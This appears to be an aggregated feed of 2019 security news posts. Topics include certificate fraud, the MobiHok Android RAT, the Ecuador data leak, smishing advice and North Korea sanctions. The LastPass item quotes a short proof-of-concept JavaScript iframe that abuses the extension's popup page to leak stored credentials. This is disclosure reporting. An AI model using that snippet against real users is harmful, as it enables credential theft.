Protects the company network from website and internet-based attacks.

Email Security

Monitors inbound and outbound emails for any malicious files and attachments, spam emails, and phishing emails.

Encryption

A service where outbound files are scrambled using ciphers to prevent any third party from reading the file.

Data Loss Prevention (DLP)

Monitors, protects, and backs up files in case of data breach or loss.

Final Note

Businesses today know just how important data and information are. That’s why cybersecurity is a top priority for many businesses that deal with sensitive information.

Through security as a service (SECaaS), companies of all sizes can have the best cybersecurity without breaking the bank.

Also Read,

The 10 Best Managed Security Service Providers in 2019

Illegal Streaming Services Threatens Computers and Data Security

Adwind Spyware-as-a-Service Utility Grid Operators Attacks

The post Security as a Service: Why Apply for SECaaS? appeared first on .

Fraudulent purchases of digitals certificates through executive impersonation

Experts at ReversingLabs spotted a threat actor buying digital certificates by impersonating legitimate entities and then selling them on the black market.

Researchers at ReversingLabs have identified a new threat actor that is buying digital certificates by impersonating company executives, and then selling them on the black market. The experts discovered that digital certificates are then used to spread malware, mainly adware.

Threat actors sign their malware with legitimate digital certificates to avoid detection.

The experts provided details of a certificate fraud that leverages on the executive impersonation. The researchers provided evidence that the threat actors sold the purchased certificates to a cybercrime gang that used them to spread malware.

The analysis published by Reversinglabs provides technical details for each phase of the certificate fraud carried out by impersonating executive.

The fraud begins with the reconnaissance phase in which the attackers select the target to impersonate. Threat actors use publicly available information to select candidates that are usually well-established people working in the software industry.

Once identified, the threat actors scrape victim’s information from open sources, such as their public LinkedIn profile page. Then attackers set up legitimate-looking infrastructure for the entity they are impersonating in the attempt to deceive certificate authorities.

“The attacker aims to use the top-level domain confusion in order to mislead the certificate authority during their identity verification process. The gamble is that the person verifying the certificate issuance request will assume that the same company owns both the global .COM and the regional .CO.UK domains for their business.” reads the analysis published by the experts.

“Here’s where the choice of registrar becomes truly important. Since GDPR legislation came into effect, most EU domain registrars have agreed that WHOIS records are considered private and personally identifiable information. This makes knowing the true identity behind the registered domain name subject to a data release process – a bureaucratic procedure meant to be fulfilled in cases of a legitimate enquiry such as a trademark dispute or a law enforcement request.”

Once set up the infrastructure, the threat actors then proceed to purchase the certificates and verify them. The verification is done using a public antivirus scanning service, then the threat actors use the file scan record as “a clean bill of health” for potential buyers.

2019-04-30 07:07:59 – The first signed malicious file appears in the wild. The certificate is used to sign OpenSUpdater, an adware application that can install unwanted software on the client’s machine. This executable is cross-signed for timestamp verification via Symantec Time Stamping Services Signer service.” continues the analysis.

The experts pointed out that even if it is harder for the attacker to acquire digital certificates, the threat actors they tracked has shown that it is in fact possible to do so.

Pierluigi Paganini

(SecurityAffairs – digital certificates, hacking)

The post Fraudulent purchases of digitals certificates through executive impersonation appeared first on Security Affairs.

Keeping Passwords Simple

We know at times this whole password thing sounds really complicated. Wouldn't be great if there was a brain dead way you could keep passwords simple and secure at the same time? Well, it's not nearly as hard as you think. Here are three tips to keeping passwords super simple while keeping your accounts super secure.

Five ways to manage authorization in the cloud

The public cloud is being rapidly incorporated by organizations, allowing them to store larger amounts of data and applications with higher uptime and reduced costs, while at the same time, introducing new security challenges. One of the more prominent challenges is identity management and authorization. Since the beginning of cloud computing, authorization techniques in the cloud have evolved into newer models, which acknowledge the many different services that now come together to form a company’s … More

The post Five ways to manage authorization in the cloud appeared first on Help Net Security.

Targeted threat intelligence and what your organization might be missing

In this Help Net Security podcast recorded at Black Hat USA 2019, Adam Darrah (Director of Intelligence), Mike Kirschner (Chief Operating Officer) and Christian Lees (Chief Technology Officer) from Vigilate, talk about how their global threat hunting and dark web cyber intelligence research team extends the reach of a company’s security resources, and lives within the underground community to remain ahead of emerging threats. Where many other solutions rely on machine learning (ML) to access … More

The post Targeted threat intelligence and what your organization might be missing appeared first on Help Net Security.

Researchers uncover 125 vulnerabilities across 13 routers and NAS devices

In a cybersecurity study of network attached storage (NAS) systems and routers, Independent Security Evaluators (ISE) found 125 vulnerabilities in 13 IoT devices, reaffirming an industrywide problem of a lack of basic security diligence. The vulnerabilities discovered in the SOHOpelessly Broken 2.0 research likely affect millions of IoT devices. “Our results show that businesses and homes are still vulnerable to exploits that can result in significant damage,” says lead ISE researcher Rick Ramgattie. “These issues … More

The post Researchers uncover 125 vulnerabilities across 13 routers and NAS devices appeared first on Help Net Security.

BotSlayer tool can detect coordinated disinformation campaigns in real time

A new tool in the fight against online disinformation has been launched, called BotSlayer, developed by the Indiana University’s Observatory on Social Media. The software, which is free and open to the public, scans social media in real time to detect evidence of automated Twitter accounts – or bots – pushing messages in a coordinated manner, an increasingly common practice to manipulate public opinion by creating the false impression that many people are talking about … More

The post BotSlayer tool can detect coordinated disinformation campaigns in real time appeared first on Help Net Security.

Phishing attacks up, especially against SaaS and webmail services

Phishing attacks continued to rise into the summer of 2019 with cybercrime gangs’ focus on branded webmail and SaaS providers remaining very keen, according to the APWG report. The report also documents how criminals are increasingly perpetrating business email compromise (BEC) attacks by using gift card cash-out schemes. The number of phishing attacks observed in the second quarter of 2019 eclipsed the number seen in the three quarters before. The total number of phishing sites … More

The post Phishing attacks up, especially against SaaS and webmail services appeared first on Help Net Security.

Only 15% of organizations can recover from a severe data loss within an hour

There’s a global concern about the business impact and risk from rampant and unrestricted data growth, StorageCraft research reveals. It also shows that the IT infrastructures of many organizations are struggling, often failing, to deliver business continuity in the event of severe data outages. A total of 709 qualified individuals completed the research study. All participants had budget or technical decision-making responsibility for data management, data protection, and storage solutions at a company with 100-2,500 … More

The post Only 15% of organizations can recover from a severe data loss within an hour appeared first on Help Net Security.

How Will the CMMC Impact My Business and How Can We Prepare? Part 1 of 3

Part 1: Laying the Groundwork for Achieving Certification In June of this year, my colleague Tom Taylor wrote about the DoD’s announcement to instate the Cyber Security Maturity Model Certification (CMMC) and elaborated on the fact that, with the CMMC, the DoD appears to be addressing our customers’ core compliance pain points: Varying standards – […]… Read More

The post How Will the CMMC Impact My Business and How Can We Prepare? Part 1 of 3 appeared first on The State of Security.

Mini eBook: CCSP Practice Tests

The Certified Cloud Security Professional (CCSP) shows you have the advanced technical skills and knowledge to design, manage and secure data, applications and infrastructure in the cloud using best practices, policies and procedures. Download the Mini eBook for a sneak peek into the Official (ISC)² CCSP Practice Tests book. Inside you’ll find: 50 CCSP practice test items and answers to gauge your knowledge. Discount code to save on the full version which includes 1,000 items.

The post Mini eBook: CCSP Practice Tests appeared first on Help Net Security.

ImmuniWeb Discovery diminishes application security complexity and operational costs

ImmuniWeb, a global application security testing and security ratings company, is thrilled to announce the launch of ImmuniWeb Discovery that now offers: continuous discovery of external digital web assets actionable security ratings of asset hackability and attractiveness continuous web security testing, best practices and compliance monitoring (PCI DSS, GDPR) continuous monitoring of data leaks, source code exposure, phishing and domain squatting monthly subscription starting at $99 per organization ImmuniWeb Discovery substantially diminishes application security complexity … More

The post ImmuniWeb Discovery diminishes application security complexity and operational costs appeared first on Help Net Security.

Telia Carrier implemets RPKI, reducing the risk of accidental route leaks

Telia Carrier has announced, that it has implemented RPKI – a technology that validates and secures critical route updates or BGP announcements on its #1 ranked global Internet backbone. BGP is the central nervous system of the Internet and RPKI reduces the risk of accidental route leaks, or even hijacks, which can result in critical outages or fraudulent traffic manipulation. Internet connectivity has become an indispensable part of our everyday lives and the networks at … More

The post Telia Carrier implemets RPKI, reducing the risk of accidental route leaks appeared first on Help Net Security.

Accenture supports Exxaro to digitally transform its business and unlock new revenue streams

Accenture has collaborated with Exxaro, one of South Africa’s leading coal producers, to help digitally transform its business and unlock new revenue streams by managing the migration of its SAP solutions, and other centrally-run applications used by Exxaro business units, to Microsoft Azure. This supports Exxaro’s ambition to establish a secure, agile, cost-effective and scalable platform that will improve business processes and continuity. Accenture created a cloud transformation strategy for Exxaro that defined the business … More

The post Accenture supports Exxaro to digitally transform its business and unlock new revenue streams appeared first on Help Net Security.

Understanding the PCI Software Security Framework: New Educational Resources


Ahead of the North America Community Meeting this week in Vancouver, PCI SSC  has published new educational resources on the PCI Software Security Framework (SSF). The SSF At-a-Glance and Transitioning from PA-DSS to SSF Resource Guide provide key information to increase awareness and understanding of the SSF, its benefits and impact to the Payment Application Data Security Standard (PA-DSS) and Program.

MobiHok RAT, a new Android malware based on old SpyNote RAT

A new Android malware has appeared in the threat landscape, tracked as MobiHok RAT, it borrows the code from the old SpyNote RAT.

Experts from threat intelligence firm SenseCy spotted a new piece of Android RAT, dubbed MobiHok RAT, that used code from the old SpyNote RAT.

At the beginning of July 2019, the experts spotted a threat actor dubbed mobeebom that was offering for sale an Android Remote Administration Tool (RAT) dubbed MobiHok v4 on a prominent English hacking forum.

The experts discovered that mobeebom is active on multiple Arab-speaking hacking forums under different pseudonyms, a circumstance that suggests that he is an Arab-speaker. Researchers also noticed that the posts published by the hacker were using poor English.

mobeebom has been promoting the MobiHok RAT through multiple channels, including YouTube and a dedicated Facebook page, since January 2019.

Mobihok

MobiHok is written in Visual Basic .NET and Android Studio, it allows to fully control the infected device. Experts pointed out that the latest release of the RAT implements new features, including a bypass to the Facebook authentication mechanism.

The analysis conducted by the experts suggests that the threat actor obtained SpyNote’s source code and made some minor changes to its code before reselling it online.

“However, from a research we conducted into mobeebom’s activity in the underground communities, and the analysis of a sample of the malware builder we retrieved, it is apparent that the threat actor based MobiHok on the source code of another prominent Android RAT named SpyNote, which was leaked online in 2016.” continues the report.

“The initial findings of our technical analysis confirmed that mobeebom probably obtained SpyNote’s source code, made some minor changes, and now resells it as a new RAT under the name MobiHok.”

In July 2016, experts from Palo Alto Networks a RAT offered for free called Spynote, much like OmniRat and DroidJack, today the malware can be purchased from a website on the surface web, or downloaded for free from a forum.

MobiHok supports several features, including access to files, access to the camera, keylogging, control over SMS and contacts, the ability to bypass both Samsung security mechanisms and Google Play mechanisms, and to bind itself to another APK app.

“To conclude, despite mobeebom’s attempt to market his MobiHok v4 Android RAT as new and his declared intention to make it the top Android RAT on the market, it appears that this malware is based on the leaked source code of the known SpyNote Android RAT with only minor changes and is being reselled by the threat actor under a different name.” concludes Sensecy.

Pierluigi Paganini

(SecurityAffairs – MobiHok RAT, malware)

The post MobiHok RAT, a new Android malware based on old SpyNote RAT appeared first on Security Affairs.

New Breach Exposes an Entire Nation: Living and the Dead

A misconfigured database has exposed the personal data of nearly every Ecuadorian citizen, including 6.7 million children.

The database was discovered by vpnMentor and was traced back to Ecuadorean company Novaestra. It contained 20.8 million records, well over the country’s current population of 16 million. The data included official government ID numbers, phone numbers, family records, birthdates, death dates (where applicable), marriage dates, education histories, and work records.

“One of the most concerning parts about this data breach is that it includes detailed information about people’s family members,” stated a blog from vpnMentor announcing the discovery of the leak. “Most concerningly, the leaked data seems to include national identification numbers and unique taxpayer numbers. This puts people at risk of identity theft and financial fraud.”

The leaked data also included financial information for individuals and businesses including bank account status, account balance, credit type, job details, car models, and car license plates.

“The information in both indexes would be as valuable as gold in the hands of criminal gangs,” wrote ZDNet reporter Catalin Cimpanu. “Crooks would be able to target the country’s most wealthy citizens (based on their financial records) and steal expensive cars (having access to car owners’ home addresses and license plate numbers).” 

The exposed database was on a server running Elasticsearch, a software program that enables users to query large amounts of data. Elasticsearch has been involved in several high profile data leaks, mostly due to configuration mistakes. Other recent Elasticsearch leaks included a Canadian data mining firm’s records for 57 million US citizens, a medical database storing the data on 85 percent of Panamanian citizens, and a provincial Chinese government database that contained 90 million personal and business records. 

The post New Breach Exposes an Entire Nation: Living and the Dead appeared first on Adam Levin.

City Blocks Email Account of Alderman Who Refuses Cybersecurity Training

City Blocks Email Account of Alderman Who Refuses Cybersecurity Training

Officials in the Tennessee city of Germantown have restricted the email account of an alderman who refuses to undergo cybersecurity training. 

Insurance specialist and married father of one Dean Massey was elected to the position of alderman in 2016. His official DMassey@germantown-tn.gov email account was restricted earlier this month after Massey failed to complete a mandatory cybersecurity training course.

All Germantown officials and city employees were asked to complete the 45-minute course by a specific date and were warned that failure to comply would result in their email access being restricted. 

Massey, who holds a degree in criminal justice from the University of Mississippi, told the Commercial Appeal website that he refused to complete the cybersecurity training because the instruction to do so had come to him from the city’s unelected director of information technology. 

"I don't think it's appropriate for a city employee to tell aldermen what they have to do to access their email," said Massey.  

Massey responded to the imposed restriction by setting up a personal email account—dmassey.cityofgermantown@gmail.com—to handle his official city business. Conducting public business from a personal email address does not violate any Tennessee state laws or ethics guidelines but could complicate the process of fulfilling public records requests. 

Massey's refusal comes in the wake of a July 2019 ransomware attack on the neighboring city of Collierville, which compromised the town's internal servers. 

Commenting on Massey's argument that an elected official shouldn't have to comply with a directive from an unelected official, fellow Germantown alderman Rocky Janda told Infosecurity Magazine: "Mr. Massey came up with that reason for not taking the training. This was a city administrator/mayor decision to make it mandatory for all employees and elected officials due to recent local threats. Staff does not make these kinds of decisions on their own." 

Asked if Mr. Massey's actions had undermined the authority of Germantown's aldermen, Janda said: "Nothing Mr. Massey can do would undermine the authority of the aldermen. There is nothing special about him."

Janda, who himself became a victim of cyber-crime when hackers targeted his company with ransomware, believes mandatory cybersecurity training for elected officials is a good idea. Asked if he thought that Massey's ability to carry out his alderman duties had been affected by the restriction of his official email account, Janda said: "Yes, at least with staff." 

Stating how he would like to see the situation resolved, Janda said: "Mr. Massey just needs to take the training. It's 45 minutes . . ."

According to Commercial Appeal, Janda has asked the city administration to discuss a potential censure of Massey's actions to encourage a discussion around cybersecurity issues. Massey has also asked for cybersecurity to be added to the administration's agenda for the next meeting, which will take place on September 23.  

Massey did not respond to Infosecurity Magazine's request for comment.

Data of Virtually All Ecuadoreans Leaked Online

Data of Virtually All Ecuadoreans Leaked Online

The personal data of almost every citizen of Ecuador has been leaked online in a catastrophic data breach. 

The names, phone numbers, and financial information of approximately 20 million Ecuadoreans were found on an unsecured cloud server by researchers working on a web-mapping project at security company vpnMentor.

The enormous 18GB cache of data included personal information relating to individuals who were deceased as well as to the country's living population of approximately 17 million. Personal information relating to 6.7 million Ecuadorean children was among the data leaked.

Exposed files revealed a large amount of sensitive personally identifiable information, such as family records, marriage dates, education histories, employment records, and official ten-digit government ID numbers called cédulas de identidad.

"This data breach is particularly serious simply because of how much information was revealed about each individual," wrote Noam Rotem and Ran Locar from vpnMentor. "Scammers could use this information to establish trust and trick individuals into exposing more information." 

Tax records and financial records revealing the account balances of customers of a large Ecuadorean bank were among the data breached. 

Rotem and Locar wrote, "Although the exact details remain unclear, the leaked database appears to contain information obtained from outside sources. These sources may include Ecuadorian government registries, an automotive association called Aeade, and Biess, an Ecuadorian national bank."

A simple search of the leaked data would enable anyone to put together a list of wealthy Ecuadoreans that would be the envy of kidnappers everywhere. Taken as a whole, the data revealed not just who had large amounts of money in the bank but also where they lived, if they were married, if they had children, what cars they drove, and the license plates of their vehicles. 

Within the leaked records researchers also found an entry and national identification number for WikiLeaks founder Julian Assange, who was granted political asylum by Ecuador in 2012. 

Rotem and Locar found the exposed data in a number of files saved on a server located in Miami, Florida, which was set up and maintained by Ecuadorian marketing and analytics company Novaestrat

After discovering the data cache, vpnMentor contacted Novaestrat. The Ecuador Computer Emergency Security Team restricted access to the unsecured server on September 11, 2019. 

The breach follows a similar incident that took place recently in another South American country. Last month, a server was found that exposed the voter records of 80% of Chile's 14.3 million citizens.

Chicago Broker Fined $1.5m for Inadequate Cybersecurity

Chicago Broker Fined $1.5m for Inadequate Cybersecurity

A US futures and securities clearing broker has been slapped with a $1.5m fine for failing to implement and enforce adequate cybersecurity measures. 

An investigation into Phillip Capital Incorporated (PCI) by the US Commodity Futures Trading Commission (CFTC) revealed a culture in which employees were not monitored to ensure that the cybersecurity of the business was protected and maintained.

Inadequate cybersecurity measures put in place within the Chicago-based company were found to be partially responsible for a data breach and the theft by cyber-criminals of $1m in PCI customer funds. 

The theft occurred when one of the company's IT engineers fell victim to a phishing email. The CFTC criticized PCI for taking too long to report the crime to customers after it happened in early 2018.  

On September 12, 2019, the CFTC issued an order that filed and simultaneously settled charges against PCI "for allowing cyber criminals to breach PCI email systems, access customer information, and successfully withdraw $1 million in PCI customer funds," and also for failing to disclose the breach to its customers "in a timely manner."

In a statement published on its website, the CFTC said that "the order finds that PCI failed to supervise its employees with respect to cybersecurity policy and procedures, a written information systems security program, and customer disbursements."

PCI was issued a civil monetary penalty of $500,000 and ordered to pay $1m in restitution. The broker was credited with the $1m restitution "based on its prompt reimbursement of the customer funds when the fraud was discovered."

The commission's investigation into PCI may be over, but the CFTC plans to keep an eye on the registered futures commission merchant's cybersecurity practices. The order filed by the CFTC requires PCI to provide reports to the commission on its remediation efforts. 

"Cybercrime is a real and growing threat in our markets," said CFTC director of enforcement James McDonald. "While it may not be possible to eliminate all cyber threats, CFTC registrants must have adequate procedures in place—and follow those procedures—to protect their customers and their accounts from potential harm."

Data leak exposes sensitive data of all Ecuador ‘citizens

Experts discovered a huge data leak affecting Ecuador, maybe the largest full-country leak, that exposed data belonging to 20 million Ecuadorian Citizens.

Security experts at vpnMentor have discovered a huge data leak affecting Ecuador that exposed data belonging to 20 million Ecuadorian Citizens.

Data were left unsecured online on a misconfigured Elasticsearch server, exposed data includes full PII, marital status and date of marriage, level of education, financial info, and more. 

Maybe this is the largest full-country leak, it affects the whole country and the exposure of such data pose a severe threat to Ecuadorian citizens.

vpnMentor’s research team has found a large data breach that may impact millions of individuals in Ecuador. The leaked database includes over 20 million individuals.” reads the post published by vpnMentor.

“Led by Noam Rotem and Ran Locar, our team discovered the data breach on an unsecured server located in Miami, Florida. The server appears to be owned by Ecuadorian company Novaestrat.

Leaked data include citizens’ financial records and car registration information.

The personal records of most of Ecuador’s population, including children, has been left exposed online due to a misconfigured database, ZDNet has learned.

The server contained a total of 20.8 million user records (18 GB of data), more than the country’s total population (16.6 million), likely due to the presence of duplicate records and data of deceased citizens.

Ecuador data leak

The analysis of the indexes revealed that the database is composed of data gathered from government sources (most from Ecuadorian government) and data gathered from private databases.

“Individuals in the database are identified by a ten-digit ID code. In some places in the database, that same ten-digit code is referred to as “cedula” and “cedula_ruc”.” continues the post.

“In Ecuador, the term “cédula” or “cédula de identidad” refers to a person’s ten-digit national identification number, similar to a social security number in the US.

The term “RUC” refers to Ecuador’s unique taxpayer registry. The value here may refer to a person’s taxpayer identification number.”

The experts found within the leaked records an entry for WikiLeaks founder Julian Assange that also includes the “cedula.”

Experts also found million of entries for children under the age of 18 that contained names, cedulas, places of birth, gender, home addresses.

The data base was secured on September 11, 2019, after vpnMentor notifies its discovery to the Ecuador CERT (Computer Emergency Response Team) team.

Pierluigi Paganini

(SecurityAffairs – Ecuador, data leak)

The post Data leak exposes sensitive data of all Ecuador ‘citizens appeared first on Security Affairs.

Smishing Explained: What It Is and How You Can Prevent It

Reading Time: ~ 3 min.

Do you remember the last time you’ve interacted with a brand, political cause, or fundraising campaign via text message? Have you noticed these communications occurring more frequently as of late?

It’s no accident. Whereas marketers and communications professionals can’t count on email opens or users accepting push notifications from apps, they’re well aware that around 98% of SMS messages are read within seconds of being received

Click here to see how 9 top endpoint security products perform against 15 efficiency benchmarks in the 2019 PassMark Report

As with any development in how we communicate, the rise in brand-related text messaging has attracted scammers looking to profit. Hence we arrive at a funny new word in the cybersecurity lexicon, “smishing.” Mathematical minds might understand it better represented by the following equation:

SMS + Phishing = Smishing

For the rest of us, smishing is the act of using text messages to trick individuals into divulging sensitive information, visiting a risky site, or downloading a malicious app onto a smartphone. These often benign seeming messages might ask you to confirm banking details, verify account information, or subscribe to an email newsletter via a link delivered by SMS.

As with phishing emails, the end goal is to trick a user into an action that plays into the hands of cybercriminals. Shockingly, smishing campaigns often closely follow natural disasters as scammers try to prey on the charitable to divert funds into their own pockets.

Smishing vs Vishing vs Phishing

If you’re at all concerned with the latest techniques cybercriminals are using to defraud their victims, your vocabulary may be running over with terms for the newest tactics. Here’s a brief refresher to help keep them straight.

  • Smishing, as described above, uses text messages to extract the sought after information. Different smishing techniques are discussed below.
  • Vishing is when a fraudulent actor calls a victim pretending to be from a reputable organization and tries to extract personal information, such as banking or credit card information.
  • Phishing is any type of social engineering attack aimed at getting a victim to voluntarily turn over valuable information by pretending to be a legitimate source. Both smishing and vishing are variations of this tactic.

Examples of Smishing Techniques

Enterprising scammers have devised a number of methods for smishing smartphone users. Here are a few popular techniques to be aware of:

  • Sending a link that triggers the downloading of a malicious app. Clicks can trigger automatic downloads on smartphones the same way they can on desktop internet browsers. In smishing campaigns, these apps are often designed to track your keystrokes, steal your identity, cede control of your phone to hackers, or encrypt the files on your phone and hold them for ransom.
  • Linking to information-capturing forms. In the same way many email phishing campaigns aim to direct their victims to online forms where their information can be stolen, this technique uses text messages to do the same. Once a user has clicked on the link and been redirected, any information entered into the form can be read and misused by scammers.
  • Targeting users with personal information. In a variation of spear phishing, committed smishers may research a user’s social media activity in order to entice their target with highly personalized bait text messages. The end goal is the same as any phishing attack, but it’s important to know that these scammers do sometimes come armed with your personal information to give their ruse a real feel.
  • Referrals to tech support. Again, this technique is a variation on the classic tech support scam, or it could be thought of as the “vish via smish.” An SMS message will instruct the recipient to contact a customer support line via a number that’s provided. Once on the line, the scammer will try to pry information from the caller by pretending to be a legitimate customer service representative. 

How to Prevent Smishing

For all the conveniences technology has bestowed upon us, it’s also opened us up to more ways to be ripped off. But if a text message from an unknown number promising to rid you of mortgage debt (but only if you act fast) raises your suspicion, then you’re already on the right track to avoiding falling for smishing.

Here are a few other best practices for frustrating these attacks:

  • Look for all the same signs you would if you were concerned an email was a phishing attempt: 1) Check for spelling errors and grammar mistakes, 2) Visit the sender’s website itself rather than providing information in the message, and 3) Verify the sender’s telephone address to make sure it matches that of the company it purports to belong to.
  • Never provide financial or payment information on anything other than the trusted website itself.
  • Don’t click on links from unknown senders or those you do not trust
  • Be wary of “act fast,” “sign up now,” or other pushy and too-good-to-be-true offers.
  • Always type web addresses in a browser rather than clicking on the link.
  • Install a mobile-compatible antivirus on your smart devices.

The post Smishing Explained: What It Is and How You Can Prevent It appeared first on Webroot Blog.

A flaw in LastPass password manager leaks credentials from previous site

A flaw in LastPass password manager leaks credentials from previous site

An expert discovered a flaw in the LastPass password manager that exposes login credentials entered on a site previously visited by a user.

Tavis Ormandy, the popular white-hat hacker at Google Project Zero, has discovered a vulnerability in the LastPass password manager that exposes login credentials entered on a site previously visited by a user.

lastpass

On September 12, 2019, LastPass has released an update to address the vulnerability with the release of the version 4.33.0.

“Hello, I noticed that you can create a popup without calling do_popupregister() by iframing popupfilltab.html (i.e. via moz-extension, ms-browser-extension, chrome-extension, etc). It’s a valid web_accessible_resource.” reads a security advisory published by Ormandy.

“Because do_popupregister() is never called, ftd_get_frameparenturl() just uses the last cached value in g_popup_url_by_tabid for the current tab. That means via some clickjacking, you can leak the credentials for the previous site logged in for the current tab.”

Ormandy published a step by step procedure to exploit the flaw and display the credentials provided to the previously visited website.

y = document.createElement("iframe");
y.height = 1024;
y.width = "100%";
y.src="chrome-extension://hdokiejnpimakedhajhdlcegeplioahd/popupfilltab.html";
// or y.src="moz-extension://...";
// or y.src="ms-browser-extension://...";
document.body.appendChild(y);  

The expert explained that the bug is easy to exploit and required no other user interaction, the attacker could trick victims into visiting malicious pages to extract the credentials entered on previously-visited sites.

“Ah-ha, I just figured out how to do this google automatically, because compare_tlds(lp_gettld_url(a), lp_gettld_url(t)) succeeds for translate.google.com and accounts.google.com, but you can iframe untrusted sites with translate.google.com, so the top url is irrelevant.” continues the expert.

“I think it’s fair to call this “High” severity, even if it won’t work for *all* URLs.”

At the time of writing, there is no news about the exploitation of this bug in attacks in the wild.

LastPass implements an auto-update process for both mobile apps and browser extensions, users that have disabled it for some reason have to perform a manual update.

Pierluigi Paganini

(SecurityAffairs – LastPass, hacking)

The post A flaw in LastPass password manager leaks credentials from previous site appeared first on Security Affairs.

Another Side Channel in Intel Chips

Not that serious, but interesting:

In late 2011, Intel introduced a performance enhancement to its line of server processors that allowed network cards and other peripherals to connect directly to a CPU's last-level cache, rather than following the standard (and significantly longer) path through the server's main memory. By avoiding system memory, Intel's DDIO­short for Data-Direct I/O­increased input/output bandwidth and reduced latency and power consumption.

Now, researchers are warning that, in certain scenarios, attackers can abuse DDIO to obtain keystrokes and possibly other types of sensitive data that flow through the memory of vulnerable servers. The most serious form of attack can take place in data centers and cloud environments that have both DDIO and remote direct memory access enabled to allow servers to exchange data. A server leased by a malicious hacker could abuse the vulnerability to attack other customers. To prove their point, the researchers devised an attack that allows a server to steal keystrokes typed into the protected SSH (or secure shell session) established between another server and an application server.

Israeli Cops Arrest Cyber Surveillance Vendor’s Employees

Israeli Cops Arrest Cyber Surveillance Vendor’s Employees

Israeli police have arrested several employees of a domestic company that makes cyber-surveillance tools and raided its offices over the weekend, according to local reports.

Although a court order has prevented many details of the case from making it into the public domain, including the identity of the suspects, the arrests were apparently made under charges of fraud, smuggling and money-laundering.

The individuals are thought to be staff at Ability Computer & Software Industries and Ability Security Systems, subsidiaries of Ability, which markets itself as providing interception technology for mobile cellular and satellite communications.

Founded in 1994 by “military and communication experts,” Ability claims to count governments, military, law enforcement and border control agencies as its customers.

However, there are suspicions that the firm may have broken Israeli laws around the export of specific security-related technologies, according to Haaretz.

The Israeli defense ministry is said to have suspended Ability subsidiaries from its official list of registered defense export companies after it exported geolocation systems without a license.

The firm is also facing a backlash from US regulator the SEC over an anti-fraud investigation dating back to 2017 about its 2015 merger with shelf company Cambridge Capital Acquisition Corporation.

Ability also paid out $3m last year to settle out-of-court with investors who said they’d been misled about the state of the firm’s finances.

The police investigation is being undertaken by the International Crime Investigations unit alongside the Director of Security of the Defense Establishment, according to the report.

The news comes just weeks after the Israeli government made moves to ease the process for exporting cyber-weapons to certain countries, despite warnings from the UN and others that such tools are being used by despotic governments to crack down on dissent.

Spam Campaign Targeting German Users with Ordinypt Malware

A new spam campaign is attempting to infect German-speaking users with samples of the destructive Ordinypt malware family. According to Bleeping Computer, the campaign sent spam emails masquerading as a job application from someone named Eva Richter. These messages supported this claim by using the subject line “Bewerbung via Arbeitsagentur – Eva Richterwhich,” which translates […]… Read More

The post Spam Campaign Targeting German Users with Ordinypt Malware appeared first on The State of Security.

France and Germany will block Facebook’s Libra cryptocurrency

Bad news for Facebook and its projects, France and Germany agreed to block Facebook’s Libra cryptocurrency, the French finance ministry said.

France and Germany governments announced that they will block Facebook’s Libra cryptocurrency, the news was reported by French finance ministry Bruno Le Maire.

“We believe that no private entity can claim monetary power, which is inherent to the sovereignty of nations”. reads a joint statement issued by the two governments,

“I want to be absolutely clear: in these conditions, we cannot authorise the development of Libra on European soil.” he said at a conference in Paris on virtual currencies.

French Finance Minister Bruno Le Maire explained last week the Facebook should not be allowed to operate the Libra cryptocurrency in Europe because it threatens the monetary sovereignty and financial systems of the states.

Facebook Libra cryptocurrency
Source: Coindesk.com

Facebook announced in June that it plans to launch Libra in 2020, to make it reliable the social network giant wants to use traditional currency to back Libra. 

The non-profit Libra Association include major firms such as PayPal, Visa, Stripe, Mastercard, eBay, and Uber. 

“Unlike other cryptocurrencies, which are not controlled by a central authority, Libra will not be decentralised, but will be entrusted to a Swiss-based association of major technology and financial services companies. Besides Facebook, backers of Libra include the payment companies Visa, MasterCard and PayPal, and the ride-hailing apps Lyft and Uber.” reported The Guardian.

Authorities also fear possible abuses of the Libra cryptocurrency, including money laundering, and how Facebook would prevent them.

Pierluigi Paganini

(SecurityAffairs – Facebook, cryptocurrency)

The post France and Germany will block Facebook’s Libra cryptocurrency appeared first on Security Affairs.

Raytheon’s cloud-based test bed takes risk out of innovation

Risk, compliance and security are primary concerns for companies operating in the defense industry. But increased focus on these issues can complicate an organization’s agility when adopting or adapting to new technology. This is what Raytheon was up against when it embarked on an IT initiative to develop a secure, cloud-based virtual innovation environment to test and explore new technology.

New technology that hasn’t been screened or tested for potential security threats or vulnerabilities can pose a major risk to organization that prioritizes security. In developing its innovation environment, Raytheon needed to create a solution that both supports the “rigorous and time-consuming processes” of testing for potential security threats and “expedites the risk reviews while still achieving speed, agility and compliance,” says Pierre Brennecke, manager of digital channels and events at the defense contractor.

To read this article in full, please click here

(Insider Story)

US Slaps Sanctions on Three North Korean Cyber Groups

US Slaps Sanctions on Three North Korean Cyber Groups

The US Treasury has finally announced sanctions on three notorious North Korean state hacking groups, which it accused of attacks designed to generate money for the country’s illegal weapons program.

The Office of Foreign Assets Control (OFAC) said on Friday that the sanctions would apply to Lazarus Group, Bluenoroff and Andariel. It effectively demanded that global banks block any transactions related to the groups.

All three entities have been pegged as under the control of the Reconnaissance General Bureau (RGB), Pyongyang’s primary intelligence agency.

Lazarus Group is the largest and best known, having been blamed for the destructive malware attack on Sony Pictures Entertainment and WannaCry. Along with Bluenoroff hackers it is also said to have launched the daring $80m cyber-heist on Bangladesh Bank.

While Lazarus Group targets range far and wide — including government, military, financial, manufacturing, publishing, media, entertainment, international shipping and critical infrastructure — Bluenoroff was apparently set up explicitly with the aim of making money to overcome global sanctions on North Korea.

Andariel, meanwhile, is apparently focused on hacking ATMs, stealing customer information to sell on the dark web, and stealing from online gambling sites, as well as hacking South Korean military systems to gather intelligence.

The groups’ efforts also focused on cryptocurrency exchanges in a bid to generate more funds for Pyongyang’s missile and nuclear weapons programs, the Treasury claimed.

This chimes with allegations from the UN, denied by North Korea, that the hermit nation had amassed a trove of $2bn from “at least 35 reported instances of DPRK actors attacking financial institutions, cryptocurrency exchanges and mining activity” across 17 countries.

“Treasury is taking action against North Korean hacking groups that have been perpetrating cyber-attacks to support illicit weapon and missile programs,” said Sigal Mandelker, Treasury under secretary for terrorism and financial intelligence. 

“We will continue to enforce existing US and UN sanctions against North Korea and work with the international community to improve cybersecurity of financial networks.”

UK’s Environmental Agencies Lose Hundreds of Devices

UK’s Environmental Agencies Lose Hundreds of Devices

The UK government is in hot water again after Freedom of Information (FOI) requests revealed its Environment Department has misplaced hundreds of laptops and mobile devices over recent years.

Security vendor Absolute Software sent requests for info to the Department for Environment, Food, and Rural Affairs (DEFRA) and non-departmental public body the Environment Agency, which it sponsors.

